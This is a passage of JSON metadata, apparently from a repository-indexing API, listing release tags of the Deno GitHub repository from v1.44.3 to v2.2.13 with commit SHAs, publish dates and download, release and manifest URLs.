a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.gi